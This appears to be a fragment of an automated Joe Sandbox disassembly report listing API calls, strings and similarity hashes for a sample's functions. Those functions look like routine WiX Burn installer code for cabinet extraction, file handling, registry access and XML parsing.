• CompareStringA.KERNELBASE(00000000,00000000,<the>.cab,?,?), ref: 007E08F2
• GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,?), ref: 007E090A
• GetCurrentProcess.KERNEL32(?,00000000,?,?), ref: 007E090F
• DuplicateHandle.KERNELBASE(00000000,?,?), ref: 007E0912
• GetLastError.KERNEL32(?,?), ref: 007E091C
• CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,08000080,00000000,?,?), ref: 007E098B
• GetLastError.KERNEL32(?,?), ref: 007E0998
Strings
• Failed to duplicate handle to cab container., xrefs: 007E094A
• Failed to open cabinet file: %hs, xrefs: 007E09C9
• <the>.cab, xrefs: 007E08EB
• cabextract.cpp, xrefs: 007E0940, 007E09BC
• Failed to add virtual file pointer for cab container., xrefs: 007E0971
Similarity
• API ID: CurrentErrorLastProcess$CompareCreateDuplicateFileHandleString
• String ID: <the>.cab$Failed to add virtual file pointer for cab container.$Failed to duplicate handle to cab container.$Failed to open cabinet file: %hs$cabextract.cpp
• API String ID: 3030546534-3446344238
• Opcode ID: 2ae51bd35203da012259842651041263bdb4dc03b03b350ad9022a6c401a8e93
• Instruction ID: 84291e7c5a7716c55b2bd5ecc42433e4ea7a1890bb87755e9b282ffa8d399993
• Opcode Fuzzy Hash: 2ae51bd35203da012259842651041263bdb4dc03b03b350ad9022a6c401a8e93
• Instruction Fuzzy Hash: 4F31E172942636BBEB215A968C49F9ABA6CFF08770F110115FE04F7242D768AC408AE1
APIs
• GetCurrentProcess.KERNEL32(000000FF,00000000,00000001,00000002,?,00000000,?,?,007C4E11,?,?), ref: 007D6A77
• GetCurrentProcess.KERNEL32(?,00000000,?,?,007C4E11,?,?), ref: 007D6A7D
• DuplicateHandle.KERNELBASE(00000000,?,?,007C4E11,?,?), ref: 007D6A80
• GetLastError.KERNEL32(?,?,007C4E11,?,?), ref: 007D6A8A
• CloseHandle.KERNEL32(000000FF,?,007C4E11,?,?), ref: 007D6B03
Strings
• Failed to duplicate file handle for attached container., xrefs: 007D6AB8
• core.cpp, xrefs: 007D6AAE
• %ls -%ls=%u, xrefs: 007D6AD7
• Failed to append the file handle to the command line., xrefs: 007D6AEB
• burn.filehandle.attached, xrefs: 007D6AD0
Similarity
• API ID: CurrentHandleProcess$CloseDuplicateErrorLast
• String ID: %ls -%ls=%u$Failed to append the file handle to the command line.$Failed to duplicate file handle for attached container.$burn.filehandle.attached$core.cpp
• API String ID: 4224961946-4196573879
• Opcode ID: 67ded8f258a157b63c7ff893bd4666efba8831c0783ebefc6e2501b0a6fdde22
• Instruction ID: 9f7b9bd5d1c00e2ef80c98d3e228ea8303764a95dc596a8d896a121ac1073564
• Opcode Fuzzy Hash: 67ded8f258a157b63c7ff893bd4666efba8831c0783ebefc6e2501b0a6fdde22
• Instruction Fuzzy Hash: 5F118472A41625FBCB10ABA89D09E9E7B68EF45730F118266F920F73D0D7789D0096D0
APIs
• VariantInit.OLEAUT32(?), ref: 00803309
• SysAllocString.OLEAUT32(?), ref: 00803325
• VariantClear.OLEAUT32(?), ref: 008033AC
• SysFreeString.OLEAUT32(00000000), ref: 008033B7
Similarity
• API ID: StringVariant$AllocClearFreeInit
• String ID: `<u$xmlutil.cpp
• API String ID: 760788290-3482516102
• Opcode ID: aae71d01c145bcb19e28fb03d0079607de55b2708df7ccf3e3e752143be53af7
• Instruction ID: 1085461ef0e9205c528b51ab87cbd24eabf10b412d81eeafffec7266dd1c8ab9
• Opcode Fuzzy Hash: aae71d01c145bcb19e28fb03d0079607de55b2708df7ccf3e3e752143be53af7
• Instruction Fuzzy Hash: 4C216B32901219ABCB619B94DC89EAEBBB9FF44B15F16415CF901EB360DB319E008B90
APIs
• OpenProcessToken.ADVAPI32(?,00000008,?,007C53BD,00000000,?,?,?,?,?,?,?,007D769D,00000000), ref: 00800897
• GetLastError.KERNEL32(?,?,?,?,?,?,?,007D769D,00000000), ref: 008008A1
• GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?,?,?,?,?,?,?,?,007D769D,00000000), ref: 008008D3
• GetLastError.KERNEL32(?,?,?,?,?,?,?,007D769D,00000000), ref: 008008EC
• CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,007D769D,00000000), ref: 0080092B
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLastToken$CloseHandleInformationOpenProcess
                                                                                                                                                              • String ID: procutil.cpp
                                                                                                                                                              • API String ID: 4040495316-1178289305
                                                                                                                                                              • Opcode ID: e50fb79b62839a1b050c97485ea87d166756cea66214a05a04f56ed9553c8286
                                                                                                                                                              • Instruction ID: cf42080d34457c004446aae5ab330db047c453db14985d72d0c32fdbde533cb4
                                                                                                                                                              • Opcode Fuzzy Hash: e50fb79b62839a1b050c97485ea87d166756cea66214a05a04f56ed9553c8286
                                                                                                                                                              • Instruction Fuzzy Hash: 9921A132E4062AEBEB619B958C05B9EFFA8FF10711F118166AD14EB390D3708E00DED0
                                                                                                                                                              APIs
                                                                                                                                                              • CreateFileW.KERNELBASE(?,80000000,00000005,?,00000003,00000080,00000000,?,00000000,?,?,?), ref: 007D6B49
                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 007D6BB9
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                               • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                               • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                               • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                               • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseCreateFileHandle
                                                                                                                                                              • String ID: %ls -%ls=%u$Failed to append the file handle to the command line.$Failed to append the file handle to the obfuscated command line.$burn.filehandle.self
                                                                                                                                                              • API String ID: 3498533004-3263533295
                                                                                                                                                              • Opcode ID: 2bc5165f0d029c55d47a97ec3a967203351f3a4f4b7cdaef32a532bcc2bdb4fc
                                                                                                                                                              • Instruction ID: f0f4a003a2e7965dd89b2da26d7a82648b7d00ac78100c738c71bb5aab876298
                                                                                                                                                              • Opcode Fuzzy Hash: 2bc5165f0d029c55d47a97ec3a967203351f3a4f4b7cdaef32a532bcc2bdb4fc
                                                                                                                                                              • Instruction Fuzzy Hash: 9011D372600614BBDB215A68DC06F9B7BACEF45B30F214366FD34EB3E1D3B888118691
                                                                                                                                                              APIs
                                                                                                                                                              • CoInitialize.OLE32(00000000), ref: 00803574
                                                                                                                                                              • InterlockedIncrement.KERNEL32(0082B6C8), ref: 00803591
                                                                                                                                                              • CLSIDFromProgID.COMBASE(Msxml2.DOMDocument,0082B6B8,?,?,?,?,?,?), ref: 008035AC
                                                                                                                                                              • CLSIDFromProgID.OLE32(MSXML.DOMDocument,0082B6B8,?,?,?,?,?,?), ref: 008035B8
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                               • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                               • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                               • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                               • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: FromProg$IncrementInitializeInterlocked
                                                                                                                                                              • String ID: MSXML.DOMDocument$Msxml2.DOMDocument
                                                                                                                                                              • API String ID: 2109125048-2356320334
                                                                                                                                                              • Opcode ID: a6e102559358c0298718112b339bb2bfaf7de74d018fbfe0dccc2d4079bfe34c
                                                                                                                                                              • Instruction ID: 8d4adc0c7b8b5e368d773a8d22dc46f9d3d4b3935c04875ca136a2be5903c051
                                                                                                                                                              • Opcode Fuzzy Hash: a6e102559358c0298718112b339bb2bfaf7de74d018fbfe0dccc2d4079bfe34c
                                                                                                                                                              • Instruction Fuzzy Hash: 6BF0E530742236ABC3A11BA27D09B073EADFB90B64F100529EC10D23F0D360D98186B0
                                                                                                                                                              APIs
                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,00000001), ref: 00804A9D
                                                                                                                                                              • GlobalAlloc.KERNEL32(00000000,00000000,?,00000000,00000000,00000000,00000000,00000001), ref: 00804ACA
                                                                                                                                                              • GetLastError.KERNEL32(?,00000000,?,00000000), ref: 00804AF6
                                                                                                                                                              • GetLastError.KERNEL32(00000000,0080B7A0,?,00000000,?,00000000,?,00000000), ref: 00804B34
                                                                                                                                                              • GlobalFree.KERNEL32(00000000), ref: 00804B65
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                               • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                               • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                               • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                               • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorLast$Global$AllocFree
                                                                                                                                                              • String ID: fileutil.cpp
                                                                                                                                                              • API String ID: 1145190524-2967768451
                                                                                                                                                              • Opcode ID: 6dafe8ff1518108b38998bffefaf65f0a6e3351be325b173841ceece7d5094f1
                                                                                                                                                              • Instruction ID: 157d84ba9b006914224be096cc1901c4492d194e113b9ae719a73ae8431173fe
                                                                                                                                                              • Opcode Fuzzy Hash: 6dafe8ff1518108b38998bffefaf65f0a6e3351be325b173841ceece7d5094f1
                                                                                                                                                              • Instruction Fuzzy Hash: BB31C4B6E80239ABD7629AD98C41FAFBAA8FF44760F114155FE14E7381E731DC0086E0
                                                                                                                                                              APIs
                                                                                                                                                              • SetFilePointerEx.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?), ref: 007E0B27
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?), ref: 007E0B31
                                                                                                                                                              Strings
                                                                                                                                                              • Failed to move file pointer 0x%x bytes., xrefs: 007E0B62
                                                                                                                                                              • Invalid seek type., xrefs: 007E0ABD
                                                                                                                                                              • cabextract.cpp, xrefs: 007E0B55
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                               • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                               • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                               • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                               • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: ErrorFileLastPointer
                                                                                                                                                              • String ID: Failed to move file pointer 0x%x bytes.$Invalid seek type.$cabextract.cpp
                                                                                                                                                              • API String ID: 2976181284-417918914
                                                                                                                                                              • Opcode ID: 6abe44a0d04d59f33f093510e59fd8ccf9530c2e081dde46e4217cfb8ac42d05
                                                                                                                                                              • Instruction ID: dbf04ff7d39908477b2fbae0200e7c507bfd86fd63b2bda8dfaff3576b492c22
                                                                                                                                                              • Opcode Fuzzy Hash: 6abe44a0d04d59f33f093510e59fd8ccf9530c2e081dde46e4217cfb8ac42d05
                                                                                                                                                              • Instruction Fuzzy Hash: 9D31B071A4125AEFCB15CF99CC85EAEB769FF08724B048225F914E7250D374ED508BD0
                                                                                                                                                              APIs
                                                                                                                                                              • CreateDirectoryW.KERNELBASE(?,840F01E8,00000000,00000000,?,007DA0E8,00000000,00000000,?,00000000,007C53BD,00000000,?,?,007CD5B5,?), ref: 007C4123
                                                                                                                                                              • GetLastError.KERNEL32(?,007DA0E8,00000000,00000000,?,00000000,007C53BD,00000000,?,?,007CD5B5,?,00000000,00000000), ref: 007C4131
                                                                                                                                                              • CreateDirectoryW.KERNEL32(?,840F01E8,007C5489,?,007DA0E8,00000000,00000000,?,00000000,007C53BD,00000000,?,?,007CD5B5,?,00000000), ref: 007C419A
                                                                                                                                                              • GetLastError.KERNEL32(?,007DA0E8,00000000,00000000,?,00000000,007C53BD,00000000,?,?,007CD5B5,?,00000000,00000000), ref: 007C41A4
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                               • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                               • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                               • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                               • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CreateDirectoryErrorLast
                                                                                                                                                              • String ID: dirutil.cpp
                                                                                                                                                              • API String ID: 1375471231-2193988115
                                                                                                                                                              • Opcode ID: 13d5556ee140443ac27a1d3c3aa8b86e8b53a714250dd312e4619e96f596fab8
                                                                                                                                                              • Instruction ID: 2f87296e81f015ffc548ff65407b458b25c72aed447acc17b3e1d0f0fdf68933
                                                                                                                                                              • Opcode Fuzzy Hash: 13d5556ee140443ac27a1d3c3aa8b86e8b53a714250dd312e4619e96f596fab8
                                                                                                                                                              • Instruction Fuzzy Hash: 8811D23660033DA7DB321AA54C65F7BB7A4EF75B61F19402DFD84EA250E36C8C9092D1
                                                                                                                                                              APIs
                                                                                                                                                              • CompareStringW.KERNELBASE(0000007F,00001000,?,000000FF,version.dll,000000FF,?,?,00000000,007C6595,007C6595,?,007C563D,?,?,00000000), ref: 007C56E5
                                                                                                                                                              • GetLastError.KERNEL32(?,007C563D,?,?,00000000,?,?,007C6595,?,007C7F02,?,?,?,?,?), ref: 007C5714
                                                                                                                                                              Strings
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                               • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                               • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                               • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                               • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CompareErrorLastString
                                                                                                                                                              • String ID: Failed to compare strings.$variable.cpp$version.dll
                                                                                                                                                              • API String ID: 1733990998-4228644734
                                                                                                                                                              • Opcode ID: 68b81ecc2eeebc614ca0b3874c908c73f31a7600aae005ea3ac481f97d4d80d8
                                                                                                                                                              • Instruction ID: fca64bc9d1213082e08c5452ba9b9bf7954d112ab2fdd78ef3f5cd68d3e98a91
                                                                                                                                                              • Opcode Fuzzy Hash: 68b81ecc2eeebc614ca0b3874c908c73f31a7600aae005ea3ac481f97d4d80d8
                                                                                                                                                              • Instruction Fuzzy Hash: 23210736640915EBC7148F98CD45F5AB7A4FB45730B21031DE924EB3C0EA36FD818690
APIs
• WaitForSingleObject.KERNEL32(000000FF,?,00000000,?,?,007C4F1C,?,000000FF,?,?,?,?,?,00000000,?,?), ref: 00800A38
• GetLastError.KERNEL32(?,?,007C4F1C,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?), ref: 00800A46
• GetExitCodeProcess.KERNELBASE(000000FF,?), ref: 00800A8B
• GetLastError.KERNEL32(?,?,007C4F1C,?,000000FF,?,?,?,?,?,00000000,?,?,?,?,?), ref: 00800A95
Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: ErrorLast$CodeExitObjectProcessSingleWait
• String ID: procutil.cpp
• API String ID: 590199018-1178289305
• Opcode ID: 3f01f41ba7328c25161b00249bddda8bacb460d06cb35aaeffe1eb8d9099d90e
• Instruction ID: a1a35bb2487d7f2e6a1b3d1e449e46bb889452bc5a7814b6be91651cbb4f5fa9
• Opcode Fuzzy Hash: 3f01f41ba7328c25161b00249bddda8bacb460d06cb35aaeffe1eb8d9099d90e
• Instruction Fuzzy Hash: 74117037E41736EBDB609B949D08B9E7AA4FB04760F128255ED54EB3D0E2348E009AD1
APIs
  • Part of subcall function 007E140C: SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,007E0A19,?,?,?), ref: 007E1434
  • Part of subcall function 007E140C: GetLastError.KERNEL32(?,007E0A19,?,?,?), ref: 007E143E
• ReadFile.KERNELBASE(?,?,?,?,00000000,?,?,?), ref: 007E0A27
• GetLastError.KERNEL32 ref: 007E0A31
Strings
• Failed to read during cabinet extraction., xrefs: 007E0A5F
• cabextract.cpp, xrefs: 007E0A55
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: ErrorFileLast$PointerRead
• String ID: Failed to read during cabinet extraction.$cabextract.cpp
• API String ID: 2170121939-2426083571
• Opcode ID: e0604568e6b71430921950a4dea3d3cc4d56f4a8a80e190f16428e91a51aada9
• Instruction ID: d309531b43531ba59a0b66b03841a0b4112aaf19f76892a82d9012da76bcdadc
• Opcode Fuzzy Hash: e0604568e6b71430921950a4dea3d3cc4d56f4a8a80e190f16428e91a51aada9
• Instruction Fuzzy Hash: 5E11E536902269FBCB219F96DC09E9E7F68FF08760B018125FD14A7250C7349910D7D0
APIs
• SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,007E0A19,?,?,?), ref: 007E1434
• GetLastError.KERNEL32(?,007E0A19,?,?,?), ref: 007E143E
Strings
• Failed to move to virtual file pointer., xrefs: 007E146C
• cabextract.cpp, xrefs: 007E1462
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: ErrorFileLastPointer
• String ID: Failed to move to virtual file pointer.$cabextract.cpp
• API String ID: 2976181284-3005670968
• Opcode ID: a52b2db4a4eeefe0c167146b70215c6b808006e310f29d47c20b84c1a9dd0f45
• Instruction ID: d00735d0e710d30754d03306bcd17f3bce02fc6235bedcbbcc2de81a36218d4f
• Opcode Fuzzy Hash: a52b2db4a4eeefe0c167146b70215c6b808006e310f29d47c20b84c1a9dd0f45
• Instruction Fuzzy Hash: 5801A2379426BAB7C7225A96CC0AE8BFF28FF057707118129FD289A791D7399C10C6D0
APIs
• ReadFile.KERNELBASE(?,?,00000000,?,00000000), ref: 00803F73
• GetLastError.KERNEL32 ref: 00803FD6
Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: ErrorFileLastRead
• String ID: fileutil.cpp
• API String ID: 1948546556-2967768451
• Opcode ID: 0d4aadfb6bacf45f8c0faeadae7594e8f15834ce55b1e784df0ee43e9fa43689
• Instruction ID: b7c8a88fbbf2ad07dc0f5e0ce8119c632c355f545ab5bb050ff07a8dcf92891a
• Opcode Fuzzy Hash: 0d4aadfb6bacf45f8c0faeadae7594e8f15834ce55b1e784df0ee43e9fa43689
• Instruction Fuzzy Hash: 4A316071E0026A9FDB61CF18CD40BDA77B8FB04751F0040AAFA48E7280DBB49EC48B95
APIs
• WriteFile.KERNELBASE(00000000,00000000,00000000,?,00000000,00000000,00000000,?,?,?,00803F9A,?,?,?), ref: 00804E5E
• GetLastError.KERNEL32(?,?,00803F9A,?,?,?), ref: 00804E68
Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID: fileutil.cpp
• API String ID: 442123175-2967768451
• Opcode ID: b079ab05ecfac0313a80a48c1ed25f8694202225397c751d3dd9c7e438b35a49
• Instruction ID: 25fefedea4d937b6ad731e1511d91e30cf9f27cdef2eb2ca65c5047485d04b4e
• Opcode Fuzzy Hash: b079ab05ecfac0313a80a48c1ed25f8694202225397c751d3dd9c7e438b35a49
• Instruction Fuzzy Hash: 2FF06D73A41229ABC7608E9ADC45EDFBB6DFB44771F510125FE04E7180E731AE0086E0
APIs
• SetFilePointerEx.KERNELBASE(?,?,?,?,?,00000000,?,?,?,007D8770,00000000,00000000,00000000,00000000,00000000), ref: 00804925
• GetLastError.KERNEL32(?,?,?,007D8770,00000000,00000000,00000000,00000000,00000000), ref: 0080492F
Strings
Memory Dump Source
• Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
• Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: ErrorFileLastPointer
• String ID: fileutil.cpp
• API String ID: 2976181284-2967768451
• Opcode ID: 7676b73c2acb9c7d9e7557891149d5d0e776f1a902a2dee2202b725d68074191
• Instruction ID: 77d66f4652267344906b6155b321336e1967d959b8db461790d87cfb383672a1
• Opcode Fuzzy Hash: 7676b73c2acb9c7d9e7557891149d5d0e776f1a902a2dee2202b725d68074191
• Instruction Fuzzy Hash: D5F086B664012AABDB218F85DC05EAB7FA8FF04760B014168BE54D7361E731DC10D7E0
                                                                                                                                                              APIs
                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 007C3877
                                                                                                                                                              • GetLastError.KERNEL32 ref: 007C3881
                                                                                                                                                              • LoadLibraryW.KERNELBASE(?,?,00000104,?), ref: 007C38EA
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000000.00000002.1685795176.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                                                                                                              • Associated: 00000000.00000002.1685782504.00000000007C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685829057.000000000080B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685850764.000000000082A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              • Associated: 00000000.00000002.1685863361.000000000082D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_0_2_7c0000_w3245.jbxd
Similarity
• API ID: DirectoryErrorLastLibraryLoadSystem
• String ID:
• API String ID: 1230559179-0
APIs
• GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,007C3BB6,00000000,?,007C1474,00000000,80004005,00000000,80004005,00000000,000001C7,?,007C13B8), ref: 007C3A20
• RtlFreeHeap.NTDLL(00000000,?,007C3BB6,00000000,?,007C1474,00000000,80004005,00000000,80004005,00000000,000001C7,?,007C13B8,000001C7,00000100), ref: 007C3A27
• GetLastError.KERNEL32(?,007C3BB6,00000000,?,007C1474,00000000,80004005,00000000,80004005,00000000,000001C7,?,007C13B8,000001C7,00000100,?), ref: 007C3A31
Similarity
• API ID: Heap$ErrorFreeLastProcess
• String ID:
• API String ID: 406640338-0
APIs
• RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0082AAA0,00000000,?,008057E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00800F80
Similarity
• API ID: Open
• String ID: regutil.cpp
• API String ID: 71445658-955085611
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 007FF491
  • Part of subcall function 0080998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00809A09
  • Part of subcall function 0080998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00809A1A
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: PA9n
• API String ID: 1269201914-1067447980
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 007FF491
  • Part of subcall function 0080998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00809A09
  • Part of subcall function 0080998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00809A1A
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: PA9n
• API String ID: 1269201914-1067447980
APIs
• ___delayLoadHelper2@8.DELAYIMP ref: 007FF491
  • Part of subcall function 0080998C: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00809A09
  • Part of subcall function 0080998C: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00809A1A
Similarity
• API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
• String ID: PA9n
• API String ID: 1269201914-1067447980
APIs
• VariantInit.OLEAUT32(?), ref: 008035F8
